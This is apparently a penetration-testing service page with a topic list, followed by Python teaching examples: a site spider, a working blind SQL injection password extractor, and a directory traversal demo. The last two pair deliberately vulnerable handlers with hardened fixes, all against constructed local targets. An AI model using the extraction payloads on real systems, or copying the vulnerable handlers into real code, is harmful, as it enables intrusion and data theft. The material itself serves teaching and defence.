Web application penetration testing

Cyber security works best as a layered, multi-level approach, and penetration testing is a good way to confirm that your security posture is actually robust. You can certainly save money by relying on online or automated tools, but if you are compromised, would you be able to defend that choice of penetration testing service to your investors and clients?

A security analysis may range from a simple vulnerability scan with industry-standard tools to a full-blown penetration test that attempts an actual break-in. You receive a report with a complete list of the vulnerabilities found and remediation steps for each, following the OWASP web application penetration testing framework and guidelines.

Various tools and techniques are used:

Attack web servers with Metasploit, scan a website for vulnerabilities using Acunetix and the N-Stalker vulnerability scanner, detect phishing using Netcraft, and sniff network traffic with Wireshark.

Web application testing

    • Discover the infrastructure within the application
    • SSL configurations and weaknesses
    • Explore virtual hosting and its impact on testing
    • Learn methods to identify load balancers
    • Explore external information sources
    • Google hacking
    • Spider a Web site
    • Scripting to automate Web requests and spidering
    • Application flow charting
    • Relationship analysis within an application
    • JavaScript for the attacker
    • Vulnerability Discovery Overview
    • Creating Custom Scripts for Penetration Testing
    • Python for Penetration Testing
    • Web App Vulnerabilities and Manual Verification Techniques
    • Interception Proxies
    • Fiddler
    • OWASP Zed Attack Proxy
    • Burp Suite
    • Information Leakage & Directory Browsing
    • Username Harvesting
    • Directory Traversal
    • SQL Injection
    • Blind SQL Injection
    • Cross-Site Scripting (XSS)
    • Cross-Site Scripting Discovery
    • Cross-Site Request Forgery (CSRF)
    • Session Flaws
    • Session Fixation
    • Session hijacking (Hijack and Redirect Web Requests with the Zed Attack Proxy (ZAP))
    • AJAX
    • Logic Attacks
    • API Attacks
    • Data Binding Attacks
    • RatProxy
    • Automated Web Application Scanners
    • SkipFish
    • w3af
    • Explore methods to zombify browsers
    • Buffer overflow
    • BeEF
    • XSS-Proxy
    • Exploit the various vulnerabilities discovered
    • Exploit applications to steal cookies
    • Execute commands through Web application vulnerabilities
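The list above names spidering, scripting to automate web requests, and application flow and relationship analysis. The following is an added example, not code from the page's service or any of the tools it lists: a scope-limited spider written in Python (the language the list itself names for penetration testing scripts). The target site is a constructed in-memory dictionary of pages and `fetch()` is a stub standing in for a real HTTP client; both are assumptions. It stays on the starting host, strips fragments, resolves relative links, records each page's outgoing links as a graph, and notes the forms it finds, which is the raw material for flow charting.

```python
"""Scope-limited spider that builds an application link graph (added example).

The SITE dictionary is a constructed stand-in for the target web site and
fetch() is a transport stub; both are assumptions, not a real target.
"""
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlparse

# Constructed sample site (assumption): URL -> HTML body.
SITE = {
    "http://target.example/": (
        '<a href="/login">Login</a> <a href="/docs/">Docs</a> '
        '<a href="https://cdn.example/lib.js">cdn</a>'
    ),
    "http://target.example/login": (
        '<form action="/login" method="post"><input name="user">'
        '<input name="pass"></form> <a href="/">Home</a>'
    ),
    "http://target.example/docs/": '<a href="../login">Login</a><a href="api#intro">API</a>',
    "http://target.example/docs/api": '<a href="/admin/">Admin</a>',
    "http://target.example/admin/": "403 Forbidden",
}


class LinkExtractor(HTMLParser):
    """Collects href targets of <a> tags and (method, action) of <form> tags."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self.forms.append((a.get("method", "get").upper(), a.get("action", "")))


def fetch(url: str):
    """Transport stub (assumption). Against a real target this would be an
    HTTP GET through your interception proxy; None means not reachable."""
    return SITE.get(url)


def spider(start: str, max_pages: int = 100):
    """Breadth-first crawl limited to the starting host.
    Returns (graph, forms): graph maps each crawled URL to its sorted in-scope
    outgoing links; forms maps a URL to the (METHOD, absolute action) pairs on it."""
    scope = urlparse(start).netloc
    queue = deque([start])
    seen = {start}
    graph, forms = {}, {}
    while queue and len(graph) < max_pages:
        url = queue.popleft()
        body = fetch(url)
        if body is None:
            continue  # unreachable page: nothing to parse
        parser = LinkExtractor()
        parser.feed(body)
        out = set()
        for href in parser.links:
            abs_url, _fragment = urldefrag(urljoin(url, href))  # resolve relative, drop #anchor
            if urlparse(abs_url).netloc != scope:
                continue  # off-host links (CDNs, third parties) are out of scope
            out.add(abs_url)
            if abs_url not in seen:
                seen.add(abs_url)
                queue.append(abs_url)
        graph[url] = sorted(out)
        if parser.forms:
            forms[url] = [(m, urljoin(url, action)) for m, action in parser.forms]
    return graph, forms


if __name__ == "__main__":
    g, f = spider("http://target.example/")
    for page, links in g.items():
        print(page, "->", links)
    print("forms:", f)
```

Every page the spider records is a node and every in-scope link an edge, so the returned graph can be fed straight into a graphing tool to chart application flow; the forms map is where manual testing of parameters starts.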
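The list names SQL injection and blind SQL injection as separate topics, and the difference is worth seeing in code. Below is an added example, not code from the page or from any tool it lists: a simulated endpoint backed by an in-memory sqlite3 database (the table, rows and both handler functions are assumptions) that answers only "user exists: yes/no". With string-concatenated SQL that one bit is enough to read the whole password column, one code point at a time by binary search; the parameterised version beside it returns nothing useful to the same payloads.

```python
"""Boolean-based blind SQL injection worked against a constructed sqlite3 backend.

Added example. The users table, its rows and the two request handlers are
assumptions standing in for a real application endpoint.
"""
import sqlite3

# Constructed sample data (assumption): what the target's database holds.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
CONN.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "s3cret!"), (2, "alice", "wonderland")])
CONN.commit()


def vulnerable_user_exists(user_id: str) -> bool:
    """Endpoint with the flaw: user input concatenated into SQL.
    It leaks only True/False, so no data appears in the response directly;
    the attacker has to infer it through this one-bit oracle."""
    sql = "SELECT id FROM users WHERE id = " + user_id
    return CONN.execute(sql).fetchone() is not None


def hardened_user_exists(user_id: str) -> bool:
    """Fixed endpoint: input is type-checked and bound as a parameter, never as SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = CONN.execute("SELECT id FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


def _binary_search(oracle, make_payload, hi: int) -> int:
    """Find value v in [0, hi] given an oracle that answers 'v > n?' for a chosen n."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(make_payload(mid)):   # 'v > mid' is true, so v lies above mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(oracle, user_id: int = 1, max_len: int = 32) -> str:
    """Recover users.password for user_id using only the true/false oracle.
    Each character costs about seven requests (binary search over ASCII)
    rather than up to 127 sequential guesses."""
    # Step 1: learn the length with payloads of the form
    #   1 AND (SELECT length(password) FROM users WHERE id=1) > n
    length = _binary_search(
        oracle,
        lambda n: f"{user_id} AND (SELECT length(password) FROM users WHERE id={user_id}) > {n}",
        max_len,
    )
    # Step 2: recover each character by its code point using sqlite's substr()/unicode().
    chars = []
    for pos in range(1, length + 1):
        code = _binary_search(
            oracle,
            lambda n, pos=pos: (f"{user_id} AND (SELECT unicode(substr(password,{pos},1)) "
                                f"FROM users WHERE id={user_id}) > {n}"),
            127,
        )
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print("vulnerable endpoint leaks:", repr(extract_password(vulnerable_user_exists)))
    print("hardened endpoint leaks:  ", repr(extract_password(hardened_user_exists)))
```

Against a real target the oracle would wrap an HTTP request and decide true/false from a status code, a content length or a string in the body, which is exactly the manual verification step the list refers to: confirm that `1 AND 1=1` and `1 AND 1=2` produce observably different responses before automating anything.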
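For the directory traversal item, here is an added example (not code from the page or any tool it lists) showing a static-file handler with the flaw next to its hardened form. The web root, the page it serves and the "secret" file one level above it are constructed in a temporary directory; those paths and the two handler functions are assumptions. It also covers two details a tester should check: URL-encoded `..%2F`, and an absolute path, which makes `os.path.join` silently discard the web root.

```python
"""Directory traversal: a file-serving handler with the flaw beside its hardened form.

Added example. The web root and files below are constructed in a temporary
directory (assumption) so the code runs offline.
"""
import os
import tempfile
from urllib.parse import unquote

BASE = tempfile.mkdtemp()
WEB_ROOT = os.path.realpath(os.path.join(BASE, "www"))
os.makedirs(WEB_ROOT)
with open(os.path.join(WEB_ROOT, "index.html"), "w") as fh:
    fh.write("<h1>hello</h1>")
SECRET = os.path.join(BASE, "secret.txt")  # one level above the web root
with open(SECRET, "w") as fh:
    fh.write("TOP SECRET")


def _read(path: str):
    """Return the file's text, or None if it cannot be opened."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return None


def vulnerable_serve(requested: str):
    """Flaw: the decoded request path is joined straight onto the web root.
    '..' segments walk out of it, and an absolute path makes os.path.join
    drop WEB_ROOT entirely."""
    return _read(os.path.join(WEB_ROOT, unquote(requested)))


def hardened_serve(requested: str):
    """Canonicalise first, then refuse anything that resolves outside the web root."""
    decoded = unquote(requested).lstrip("/\\")                     # never accept an absolute path
    candidate = os.path.realpath(os.path.join(WEB_ROOT, decoded))  # collapses '..' and symlinks
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None                                                # escaped the root: refuse
    return _read(candidate)


if __name__ == "__main__":
    for req in ("index.html", "../secret.txt", "..%2Fsecret.txt", SECRET):
        print(f"{req!r}: vulnerable={vulnerable_serve(req)!r} hardened={hardened_serve(req)!r}")
```

The check is done on the resolved path rather than by rejecting the string `..`, because encoding tricks and symlinks defeat string matching; `docs/../index.html` is still served because it resolves inside the root.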